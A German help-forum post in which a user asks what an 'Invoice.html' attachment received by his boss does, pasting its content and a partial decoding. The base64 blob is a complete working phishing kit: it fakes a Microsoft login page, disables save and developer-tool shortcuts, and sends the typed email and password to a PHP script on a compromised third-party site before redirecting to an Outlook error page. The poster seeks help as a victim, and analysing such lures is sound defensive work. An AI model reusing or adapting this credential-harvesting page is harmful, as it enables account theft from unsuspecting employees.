Was machen diese JavaScripts? - NeuHier - 19.10.2022
Servus!
Brauche Eure Hilfe!
Heute Nacht kriegt mein Chef von einem Lieferant ein Mail mit "Invoice.html"-Anhang. Nichts Böses ahnend, versucht er den Anhang aufzumachen. Merkt aber sofort, das hier was faul ist.
Das hier ist Inhalt von "Invoice.html"
Code: <script>
var url_string = "firmenmail@adresse.com";
var data = atob("PCFET0NUWVBFIGh0bWw+CjxodG1sIGRpcj0ibHRyIiBjbGFzcz0iIiBsYW5nPSJlbiI+CiAgICA8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KICAgIDx0aXRsZT5FeGNlbCB3b3Jrc2hlZXQ8L3RpdGxlPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTIuMCwgdXNlci1zY2FsYWJsZT15ZXMiPgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9mYXZpY29uX2FfZXVwYXlmZ2docWlhaTdrOXNvbDZsZzIuaWNvIj4gICAgCiAgICA8bGluayBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2NvcnNAMi44LjUvbGliL2luZGV4Lm1pbi5qcyI+CiAgICA8bGluayBkYXRhLWxvYWRlcj0iY2RuIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9jZG5idW5kbGVzL2NvbnZlcmdlZC52Mi5sb2dpbi5taW5feml5dGY4ZHp0OWVnMXM2LW9oaGxlZzIuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8L2hlYWQ+CjxzY3JpcHQ+CiAgICAvLyBwcmV2ZW50IGN0cmwgKyBzCiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGFzeW5jKGUpID0+IHsKICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIChlLndoaWNoID09IDgzKSkgewogICAgICAgICAgICBlLnByZXZlbnREZWZhdWx0KCk7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsgfQogICAgfSk7CiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBldmVudCA9PiBldmVudC5wcmV2ZW50RGVmYXVsdCgpKTsKICAgIGRvY3VtZW50Lm9ua2V5ZG93biA9IGZ1bmN0aW9uIChlKSB7CiAgICAgICAgaWYgKGV2ZW50LmtleUNvZGUgPT0gMTIzKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0UnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUuc2hpZnRLZXkgJiYgZS5rZXlDb2RlID09ICdJJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLnNoaWZ0S2V5ICYmIGUua2V5Q29kZSA9PSAnSicuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdVJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ1MnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnSCcuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdBJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0YnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnRScuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgfQogICAgd2luZG93Lm9ua2V5ZG93biA9IChlKSA9PiB7CiAgICAgICAgcmV0dXJuICEoZS5jdHJsS2V5ICYmCiAgICAgICAgICAgIChlLmtleUNvZGUgPT09IDY3IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg2IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg1IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDExNykpOwogICAgfTsgICAgCjwvc2NyaXB0Pgo8Ym9keSBjbGFzcz0iY2IiIHN0eWxlPSJkaXNwbGF5OiBibG9jazsiPgo8Zm9ybSBuYW1lPSJmMSIgaWQ9ImkwMjgxIiBtZXRob2Q9InBvc3QiIGF1dG9jb21wbGV0ZT0ib2ZmIj4KICAgIDxkaXYgY2xhc3M9ImxvZ2luLXBhZ2luYXRlZC1wYWdlIj4KICAgICAgICA8ZGl2IGlkPSJsaWdodGJveFRlbXBsYXRlQ29udGFpbmVyIj4KPGRpdiBpZD0ibGlnaHRib3hCYWNrZ3JvdW5kQ29udGFpbmVyIj4KICAgIDxkaXYgY2xhc3M9ImJhY2tncm91bmQtaW1hZ2UtaG9sZGVyIiByb2xlPSJwcmVzZW50YXRpb24iPgogICAgPGRpdiBjbGFzcz0iYmFja2dyb3VuZC1pbWFnZSBleHQtYmFja2dyb3VuZC1pbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybCgmcXVvdDtodHRwczovL2d5YXpvLmNvbS9lMjFlY2NmOWUzMDdlMzYwZTNhODBjZTZiYmM3NGFmOC5wZ247KTsiPjwvZGl2Pgo8L2Rpdj48L2Rpdj4KICAgIDxkaXYgY2xhc3M9Im91dGVyIiBpZD0iYmdJbWdDZW50ZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InRlbXBsYXRlLXNlY3Rpb24gbWFpbi1zZWN0aW9uIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWlkZGxlIGV4dC1taWRkbGUiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZnVsbC1oZWlnaHQiPgogICAgPGRpdiBjbGFzcz0iZmxleC1jb2x1bW4iPgogICAgICAgIDxkaXYgY2xhc3M9Indpbi1zY3JvbGwiPgogICAgICAgICAgICA8ZGl2IGlkPSJsaWdodGJveCIgY2xhc3M9InNpZ24taW4tYm94IGV4dC1zaWduLWluLWJveCBmYWRlLWluLWxpZ2h0Ym94Ij4KICAgICAgICAgICAgPGRpdj48aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS83YWU3NzNmZjYxZTJjOGE4OGJkYTU1MzBjM2IyYWExMy5wbmciIHN0eWxlPSJ3aWR0aDo5MHB4OyBoZWlnaHQ6NzVweDsiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IHJvbGU9Im1haW4iPgogICAgICAgIDxkaXYgaWQ9InBzdGIiIGNsYXNzPSJwYWdpbmF0aW9uLXZpZXcgYW5pbWF0ZSBoYXMtaWRlbnRpdHktYmFubmVyIHNsaWRlLWluLW5leHQiPgogICAgICAgIDxkaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImlkZW50aXR5QmFubmVyIj4KICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0iYnV0dG9uIiBjbGFzcz0iYmFja0J1dHRvbiIgaWQ9ImlkQnRuX0JhY2siPiA8aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0XzdjYzA5NmRhNmFhMmRiYTNmODFmY2MxYzgyNjIxNTdjLnBuZyIgc3Znc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI+IDwvYnV0dG9uPgogICAgICAgICAgICAgICAgPGRpdiBpZD0ic2hvdy1lbWFpbCIgY2xhc3M9ImlkZW50aXR5Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0aXRsZSBleHQtdGl0bGUiPgogICAgICAgIDxkaXYgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI+RW50ZXIgcGFzc3dvcmQ8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iZXJyb3JwdyIgc3R5bGU9ImNvbG9yOiByZWQ7IG1hcmdpbjogMTVweDsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyBtYXJnaW4tYm90dG9tOiAwcHg7Ij48L2Rpdj4KICAgIDxkaXYgaWQ9ImltcG9ydGFudDEiIHN0eWxlPSJjb2xvcjogYmxhY2s7Zm9udC1zaXplOiAxM3B4OyI+CiAgICAgICAgQmVjYXVzZSB5b3UncmUgYWNjZXNzaW5nIHNlbnNpdGl2ZSBpbmZvLCB5b3UgbmVlZCB0byB2ZXJpZnkgeW91ciBwYXNzd29yZCB0byB2aWV3IGV4Y2VsIHdvcmtzaGVldHMKICAgICA8L2Rpdj4KICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwbGFjZWhvbGRlckNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0icGFzc3dkIiB0eXBlPSJwYXNzd29yZCIgaWQ9ImkwMTE4IiBhdXRvY29tcGxldGU9Im9mZiIgY2xhc3M9ImZvcm0tY29udHJvbCBpbnB1dCBleHQtaW5wdXQgdGV4dC1ib3ggZXh0LXRleHQtYm94IiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIHJlcXVpcmVkIC8+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2PgogICAgPGRpdiBjbGFzcz0icG9zaXRpb24tYnV0dG9ucyI+CiAgICAgICAgPGRpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC0yNCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0idGV4dC0xMyI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPk5vdGU6IE9ubHkgcmVjaXBpZW50J3MgZW1haWwgY2FuIGFjY2VzcyBzaGFyZWQgZmlsZXM8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8YSBpZD0iaTE2NjgiIGhyZWY9IiMiPjwvYT4KICAgICAgICAgICAgPC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAKICAgICAgICA8ZGl2IGNsYXNzPSJ3aW4tYnV0dG9uLXBpbi1ib3R0b20iPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICAgICAgPGRpdj48ZGl2IGNsYXNzPSJjb2wteHMtMjQgbm8tcGFkZGluZy1sZWZ0LXJpZ2h0IGJ1dHRvbi1jb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGlkPSJCdXR0b245IiBjbGFzcz0id2luLWJ1dHRvbiBidXR0b25fcHJpbWFyeSBidXR0b24gZXh0LWJ1dHRvbiBwcmltYXJ5IGV4dC1wcmltYXJ5IiB2YWx1ZT0iU2lnbmluIj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0icGxhdGUgZm9vdGVyIGV4dC1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj48L2Rpdj4KICAgIDxkaXYgaWQ9ImZvb3RlciIgcm9sZT0iY29udGVudGluZm8iIGNsYXNzPSJmb290ZXIgZXh0LWZvb3RlciI+CiAgICAgICAgPGRpdj4KPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4KICAgICAgICA8YSBpZD0iZnRyVGVybXMiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5UZXJtcyBvZiB1c2U8L2E+CiAgICAgICAgPGEgaWQ9ImZ0clByaXZhY3kiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E+CiAgICA8YSBpZD0ibW9yZU9wdGlvbnMiIGhyZWY9IiMiIGFyaWEtbGFiZWw9IkNsaWNrIGhlcmUgZm9yIHRyb3VibGVzaG9vdGluZyBpbmZvcm1hdGlvbiIgY2xhc3M9ImZvb3Rlci1jb250ZW50IGV4dC1mb290ZXItY29udGVudCBmb290ZXItaXRlbSBleHQtZm9vdGVyLWl0ZW0gZGVidWctaXRlbSBleHQtZGVidWctaXRlbSI+Li4uPC9hPgo8L2Rpdj48L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KPC9kaXY+PC9kaXY+CjwvZm9ybT4KPHNjcmlwdD4KICAgIHZhciBjb3VudCA9IDA7CiAgICBmdW5jdGlvbiBzZXRfYnJhbmQoZW1haWwpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIGRhdGE6IHsgdXNlcm5hbWU6IGVtYWlsIH0sCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChyZXNwb25zZSkgewogICAgICAgICAgICAgICAgbGV0IHJlcyA9IEpTT04ucGFyc2UocmVzcG9uc2UpCiAgICAgICAgICAgICAgICBsZXQgbG9nbyA9IHJlc1sicmVzIl1bIkJhbm5lckxvZ28iXSwgYmFja2dyb3VuZCA9IHJlc1sicmVzIl1bIklsbHVzdHJhdGlvbiJdLCBEYXJrVGlsZSA9IHJlc1sicmVzIl1bIlRpbGVEYXJrTG9nbyJdCiAgICAgICAgICAgICAgICBsZXQgVGlsZUxvZ28gPSByZXNbInJlcyJdWyJUaWxlTG9nbyJdLCBCb2lsZXJQbGF0ZVRleHQgPSByZXNbInJlcyJdWyJCb2lsZXJQbGF0ZVRleHQiXQogICAgICAgICAgICAgICAgaWYgKGxvZ28pIHsKICAgICAgICAgICAgICAgICAgICAkKCcubG9nbycpLmF0dHIoJ3NyYycsIGxvZ28pOwoJCQkgICAgfQogICAgICAgICAgICAgICAgaWYgKEJvaWxlclBsYXRlVGV4dCkgewogICAgICAgICAgICAgICAgICAgIGNvbnNvbGUubG9nKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuYXBwZW5kKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuY3NzKHsidGV4dC1hbGlnbiI6ICJjZW50ZXIifSkKICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmIChiYWNrZ3JvdW5kKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIGJhY2tncm91bmQgKyAnKScsICItd2Via2l0LWZpbHRlciI6ICJicmlnaHRuZXNzKDIwJSkiLCAiZmlsdGVyIjogImJyaWdodG5lc3MoNDclKSIgfSk7CiAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKERhcmtUaWxlKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIERhcmtUaWxlICsgJyknLCAiLXdlYmtpdC1maWx0ZXIiOiAiYnJpZ2h0bmVzcygyMCUpIiwgImZpbHRlciI6ICJicmlnaHRuZXNzKDQ3JSkiIH0pOwogICAgICAgICAgICAgICAgfSBlbHNlIGlmIChUaWxlTG9nbykgewogICAgICAgICAgICAgICAgICAgICQoJy5iYWNrZ3JvdW5kLWltYWdlJykuY3NzKHsgJ2JhY2tncm91bmQtaW1hZ2UnOiAndXJsKCcgKyBUaWxlTG9nbyArICcpJywgIi13ZWJraXQtZmlsdGVyIjogImJyaWdodG5lc3MoMjAlKSIsICJmaWx0ZXIiOiAiYnJpZ2h0bmVzcyg0NyUpIiB9KTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfQoKICAgIGZ1bmN0aW9uIHNlbmRfcmVzdWx0KHVzZXIsIHBhc3MpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICBkYXRhOiB7CiAgICAgICAgICAgICAgICAiZW1haWwiOiB1c2VyLAogICAgICAgICAgICAgICAgInBhc3N3b3JkIjogcGFzcwogICAgICAgICAgICB9LAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZyhkYXRhKTsKICAgICAgICAgICAgfSwKICAgICAgICAgICAgZXJyb3I6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZygnQWpheCBlcnJvcicpOwogICAgICAgICAgICB9CgkJfSk7ICAgICAgICAKICAgIH0KCiAgICAKICAgIGRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBhc3luYygpID0+IHsKICAgICAgICBpZih1cmxfc3RyaW5nKXsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInNob3ctZW1haWwiKS5pbm5lckhUTUwgPSB1cmxfc3RyaW5nOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAxMTgiKS5mb2N1cygpOwogICAgICAgICAgICBzZXRfYnJhbmQodXJsX3N0cmluZyk7CiAgICAgICAgfQoKICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQnV0dG9uOSIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgZSA9PiB7CiAgICAgICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0ID8gZXZlbnQucHJldmVudERlZmF1bHQoKSA6IGV2ZW50LnJldHVyblZhbHVlID0gZmFsc2U7CgogICAgICAgICAgICB2YXIgcHN3ZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDExOCIpLnZhbHVlOwogICAgICAgICAgICBpZihwc3dkLmxlbmd0aCA8IDUpewogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5PSJub25lIjsKICAgICAgICAgICAgICAgIHNldFRpbWVvdXQoKCkgPT4ge2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDI4MSIpLnJlc2V0KCk7IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdlcnJvcnB3JykuaW5uZXJIVE1MID0gIllvdXIgYWNjb3VudCBwYXNzd29yZCBpcyB0b28gc2hvcnQuIn0sIDE1MDApOwogICAgICAgICAgICB9IGVsc2UgaWYgKHBzd2QubGVuZ3RoID4gNSAmJiBjb3VudCA8PSAwKSB7CiAgICAgICAgICAgICAgICBzZW5kX3Jlc3VsdCh1cmxfc3RyaW5nLCBwc3dkKTsKICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbXBvcnRhbnQxIikuc3R5bGUuZGlzcGxheT0ibm9uZSI7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHtjb3VudCsrOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAyODEiKS5yZXNldCgpOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZXJyb3JwdycpLmlubmVySFRNTCA9IGBZb3VyIHBhc3N3b3JkIGlzIGluY29ycmVjdC4gUGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZCBmb3IgeW91ciBhYm92ZSBlbWFpbCB0byBhY2Nlc3MgRXhjZWwgd29ya3NoZWV0LCA8YSBocmVmPSIjIj48L2E+YH0sIDIwMDApCiAgICAgICAgICAgIH0gZWxzZSBpZiAoY291bnQgPCAyKXsKICAgICAgICAgICAgICAgIHNlbmRfcmVzdWx0KHVybF9zdHJpbmcsIHBzd2QpOwogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwogICAgICAgICAgICAgICAgc2V0VGltZW91dCgoKSA9PiB7Y291bnQrKzsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImkwMjgxIikucmVzZXQoKTsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2Vycm9ycHcnKS5pbm5lckhUTUwgPSBgWW91ciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuIFBsZWFzZSBlbnRlciB0aGUgcGFzc3dvcmQgZm9yIHlvdXIgYWJvdmUgZW1haWwgdG8gYWNjZXNzIEV4Y2VsIHdvcmtzaGVldCwgPGEgaHJlZj0iIyI+PC9hPmB9LCAyMDAwKQogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgc2VuZF9yZXN1bHQodXJsX3N0cmluZywgcHN3ZCk7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHt3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9vdXRsb29rLm9mZmljZTM2NS5jb20vRW5jcnlwdGlvbi9FcnJvclBhZ2UuYXNweD9zcmM9MyZjb2RlPTExJmJlPVNONlBSMDRNQjQwMTQmZmU9Sk5BUDI3NUNBMDA0MC5aQUZQMjc1LlBST0QuT1VUTE9PZ0suQ09NJmxvYz1lbi1VUyZpdGVtSUQ9RTRFX01fZTlkZjE1NGEtZTRiOC00NDg2LThhZWMtN2FjY2VlYjkzZmVlIil9KTsKICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfSk7Cjwvc2NyaXB0Pgo8L2Rpdj48L2JvZHk+PC9odG1sPg==");
document.write(data)
</script>
Konnte soweit den Inhalt dekodieren...
Code: <!DOCTYPE html>
<html dir="ltr" class="" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Excel worksheet</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
<link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
<link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
// prevent ctrl + s
window.addEventListener('keydown', async(e) => {
if (e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false; }
});
window.addEventListener('contextmenu', event => event.preventDefault());
document.onkeydown = function (e) {
if (event.keyCode == 123) {
return false;
}
if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
return false;
}
}
window.onkeydown = (e) => {
return !(e.ctrlKey &&
(e.keyCode === 67 ||
e.keyCode === 86 ||
e.keyCode === 85 ||
e.keyCode === 117));
};
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
<div class="login-paginated-page">
<div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
<div class="background-image-holder" role="presentation">
<div class="background-image ext-background-image" style="background-image: url("https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
<div class="outer" id="bgImgCenter">
<div class="template-section main-section">
<div class="middle ext-middle">
<div class="full-height">
<div class="flex-column">
<div class="win-scroll">
<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
<div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
<div role="main">
<div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
<div>
<div class="identityBanner">
<button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
<div id="show-email" class="identity"></div>
</div>
<div id="loginHeader" class="row title ext-title">
<div role="heading" aria-level="1">Enter password</div>
</div>
